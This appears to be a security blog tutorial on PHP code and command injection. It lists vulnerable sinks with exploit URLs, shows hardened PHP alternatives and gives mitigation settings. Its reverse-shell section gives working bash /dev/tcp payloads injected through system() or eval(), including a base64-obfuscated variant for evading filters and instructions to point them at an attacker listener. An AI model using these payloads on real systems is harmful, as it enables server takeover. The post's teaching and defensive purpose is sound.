Introduction
PHP, one of the most widely used server-side scripting languages, is a frequent target of web-based attacks because of its dynamic execution features and flexibility. Among the most critical vulnerabilities affecting PHP applications is PHP code injection, which occurs when user input is evaluated or executed as PHP code without validation. The flaw can lead to full server compromise, particularly when constructs such as `eval()` or `assert()` (which evaluated string arguments as code before PHP 8.0) receive unsanitized input, or when its close relative, OS command injection, reaches functions such as `system()`.
One well-known technique that builds on this vulnerability is the reverse shell: instead of the attacker connecting in, the injected code makes the victim server open an outbound connection back to a listener the attacker controls, which often passes inbound firewall rules untouched. It is routinely practised in security testing labs (e.g., bWAPP, DVWA) and is exactly what happens to improperly secured production apps.
In this post, we’ll explore how PHP code injection works, examine a typical reverse shell payload, understand common syntax pitfalls (such as quoting and redirection issues), and walk through safe ways to structure payloads for controlled testing environments.
Most Common Vulnerable Parameters or Input Vectors
Here’s a list of common vulnerable parameters or input vectors where arbitrary code might be injected:
🔸 1. `eval()`
Input:
eval($_GET['code']);
Exploit:
?code=phpinfo(); # Sample URL: http://victim-host/index.php?code=phpinfo();
🔸 2. `assert()` with a string argument (string evaluation DEPRECATED since PHP 7.2.0, REMOVED in PHP 8.0.0)
assert($_POST['run']);
Exploit:
POST body: run=phpinfo(); # e.g. curl -d 'run=phpinfo();' http://victim-host/upload.php (the code travels in the request body, not in the URL)
🔸 3. `preg_replace()` with the `/e` modifier (DEPRECATED since PHP 5.5.0, REMOVED in PHP 7.0.0) - the replacement string is evaluated as PHP after substitution
preg_replace('/.*/e', $_GET['code'], '');
Exploit:
?code=system('ls') # Sample URL: http://victim-host/index.php?code=system('ls');
🔸 4. `create_function()` (DEPRECATED since PHP 7.2.0, REMOVED in PHP 8.0.0) - the second argument becomes the body of a new function, so it is `eval()` in disguise
$func = create_function('', $_GET['payload']); $func();
Exploit:
?payload=phpinfo(); # Sample URL: http://victim-host/index.php?payload=phpinfo();
🔸 5. `system()`, `exec()`, `shell_exec()`, `passthru()`, `popen()` (and `proc_open()` and the backtick operator)
- Strictly these give OS command injection rather than PHP code injection, but they are reached through the same input vectors. If they are passed unsanitized input:
system($_GET['cmd']);
Exploit:
?cmd=ls -la # Sample URL: http://victim-host/index.php?cmd=ls%20-la (the space must be URL-encoded; a browser does this for you)
🔸 6. `$_GET`, `$_POST`, `$_COOKIE`, `$_REQUEST`, `$_FILES` (and `$_SERVER`, which carries client-controlled request headers)
- All of these superglobals can be vectors for injection if their values are passed to dangerous functions.
🔸 7. Custom Functions Taking User Input
Developers often create helper functions that wrap `eval()` or similar.
function runCode($input) { eval($input); } runCode($_POST['do']);
Exploit:
POST body: do=phpinfo(); # e.g. curl -d 'do=phpinfo();' http://victim-host/index.php (the parameter is read from $_POST, so it must be sent in the body)
🔸 8. Dynamic Function Calls
$func = $_GET['f']; $func('ls');
Exploit:
?f=system # Sample URL: http://victim-host/index.php?f=system (the server then runs system('ls'); a value such as phpinfo(); is not a function name and only produces "Call to undefined function")
🔸 9. Serialized or Base64-Encoded Input
- Sometimes the dangerous input is hidden inside an encoded format. `unserialize()` on untrusted data does not evaluate PHP source, but it instantiates attacker-chosen classes, and a gadget chain through magic methods such as `__wakeup()` or `__destruct()` can reach the same sinks.
$data = unserialize(base64_decode($_POST['input']));
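As an added example (not code from the original post, and serving both the vector list above and the mitigation tips below), here are three of the listed sinks beside a hardened form of each: the dynamic function call (8), command execution (5) and `unserialize()` (9). The function names, the `REPORT_HANDLERS` map and the `$_GET`/`$_POST` keys are illustrative assumptions; it needs PHP 8.0 or later.

```php
<?php
// Added example, not code from the original post. Three input vectors from the
// list above, each beside a hardened version. Function names, REPORT_HANDLERS
// and the $_GET/$_POST keys are illustrative assumptions. Requires PHP 8.0+.

declare(strict_types=1);

// --- 8. Dynamic function calls ----------------------------------------------
// VULNERABLE: whatever name arrives in ?f= is called (?f=system runs system('ls')).
function dynamicCallVulnerable(array $get): mixed
{
    $func = $get['f'];
    return $func('ls');
}

// HARDENED: the client picks a key in a fixed map; it never supplies a callable.
const REPORT_HANDLERS = [
    'summary' => 'reportSummary',
    'detail'  => 'reportDetail',
];
function reportSummary(string $arg): string { return "summary:$arg"; }
function reportDetail(string $arg): string  { return "detail:$arg"; }

function dynamicCallHardened(array $get): string
{
    $key = $get['f'] ?? '';
    if (!is_string($key) || !array_key_exists($key, REPORT_HANDLERS)) {
        throw new InvalidArgumentException('unknown handler');
    }
    return (REPORT_HANDLERS[$key])('ls');
}

// --- 5. Command execution ---------------------------------------------------
// VULNERABLE: the whole command line is attacker-controlled (?dir=.;id).
function listDirVulnerable(array $get): string
{
    return (string) shell_exec('ls -la ' . $get['dir']);
}

// HARDENED: fixed binary, a strict allowlist pattern for the single
// user-influenced token (no slash, no leading dash, so no traversal and no
// option injection) and escapeshellarg() so the shell sees one argument.
// scandir() would avoid the shell entirely and is the better choice.
function listDirHardened(array $get): string
{
    $dir = $get['dir'] ?? '.';
    if (!is_string($dir) || !preg_match('/\A[A-Za-z0-9_.][A-Za-z0-9_.-]{0,63}\z/', $dir)) {
        throw new InvalidArgumentException('bad directory name');
    }
    return (string) shell_exec('ls -la ' . escapeshellarg($dir));
}

// --- 9. Serialized input ----------------------------------------------------
// VULNERABLE: any class can be instantiated; a gadget chain through __wakeup()
// or __destruct() turns that into code execution.
function loadStateVulnerable(array $post): mixed
{
    return unserialize(base64_decode($post['input']));
}

// HARDENED: strict base64, no objects at all (they come back as
// __PHP_Incomplete_Class and are rejected) and a shape check on the result.
function loadStateHardened(array $post): array
{
    $enc = $post['input'] ?? null;
    $raw = is_string($enc) ? base64_decode($enc, true) : false;
    if ($raw === false) {
        throw new InvalidArgumentException('bad encoding');
    }
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data)) {
        throw new InvalidArgumentException('unexpected payload');
    }
    return $data;
}

// Demonstration with constructed inputs: php hardened.php
if (PHP_SAPI === 'cli') {
    echo dynamicCallHardened(['f' => 'summary']), "\n";   // summary:ls
    $attempts = [
        fn() => dynamicCallHardened(['f' => 'system']),
        fn() => listDirHardened(['dir' => '.;id']),
        fn() => loadStateHardened(['input' => base64_encode('O:8:"stdClass":0:{}')]),
    ];
    foreach ($attempts as $attempt) {
        try {
            $attempt();
        } catch (InvalidArgumentException $e) {
            echo 'blocked: ', $e->getMessage(), "\n";
        }
    }
    print_r(loadStateHardened(['input' => base64_encode(serialize(['role' => 'user']))]));
}
```

The common thread is that user input only ever selects among values the code already owns (a map key, a validated token) and never becomes a callable, a command line or an object graph.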
Testing with Reverse Shell Payload
🔧 Option 1: Escape via `eval()` or `system()` in PHP
If the sink is `eval()` or one of the command-execution functions, you can use this payload:
system("bash -c 'bash -i >& /dev/tcp/127.0.0.1/8888 0>&1'"); # Sample URL (URL-encoded, because a bare & in >& would end the code parameter early): http://victim-host/index.php?code=system(%22bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/127.0.0.1/8888%200%3E%261%27%22)%3B
Or, when the sink is `eval()`, with the inner double quotes escaped:
eval("system(\"bash -c 'bash -i >& /dev/tcp/127.0.0.1/8888 0>&1'\");");
🔧 Option 2: Use base64 to obfuscate and avoid escaping
Another method (especially if filters are present):
eval("system(base64_decode('YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODg4OCAwPiYxJw=='));");
This decodes to:
bash -c 'bash -i >& /dev/tcp/127.0.0.1/8888 0>&1'
Note: in this section 127.0.0.1:8888 stands for the listener on your attacking machine (e.g. `nc -lvnp 8888` on Kali). Replace it with the IP address the victim can actually reach (private or public) and the port you chose; a loopback address only makes sense when the target runs on the same host as the listener.
🔒 Warning (for ethical use only)
- This is a reverse shell payload used in security testing or labs like bWAPP and Mutillidae II.
- Only use this in a controlled and legal environment (like your own test VM).
- Unauthorized use is illegal and unethical.
📌 Summary: Dangerous Input Parameters
| Type | Vulnerable Parameters (examples) |
|---|---|
| Code Eval | `$_GET['code']`, `$_POST['run']`, etc. |
| Command Exec | `$_GET['cmd']`, `$_POST['exec']` |
| Dynamic Func | `$_GET['f']` |
| Serialized | `$_POST['data']` |
✅ Mitigation Tips
- Never trust user input.
- Use allowlists for function calls or files.
- Avoid `eval()`, `assert()`, and removed features such as `create_function()` and the `/e` modifier.
- Use prepared statements for DB access.
- Set appropriate PHP configuration (php.ini):
allow_url_include = Off
display_errors = Off
zend.assertions = -1
disable_functions = exec,shell_exec,system,passthru,popen,proc_open
Note that `eval` is a language construct, not a function, so `disable_functions` cannot turn it off; the only remedy is not to use it. `zend.assertions = -1` (production mode) stops `assert()` calls from being compiled at all.
Final Thoughts
Understanding how PHP interprets user input is essential for both offensive security testing and defensive coding. A single misused function, like `eval()` or `system()`, can open the door to remote code execution, especially when combined with powerful payloads like reverse shells.
Key Takeaways:
- Never trust user input; always validate and sanitize it.
- Avoid dangerous PHP functions (`eval()`, `assert()`, `system()`, etc.) unless absolutely necessary.
- Reverse shells are powerful but dangerous tools; use them only in ethical, legal, and controlled environments.
- Quoting and escaping matter: syntax errors can stop an attack, but they can also teach you how to improve your payload construction.
- Base64 encoding and `bash -c` are useful for bypassing parsing issues or basic filters during security assessments.
If you're learning penetration testing or working on CTF challenges, mastering PHP injection and reverse shell syntax can significantly boost your understanding of web application vulnerabilities. But remember: with great power comes great responsibility. Always practice safe and ethical hacking.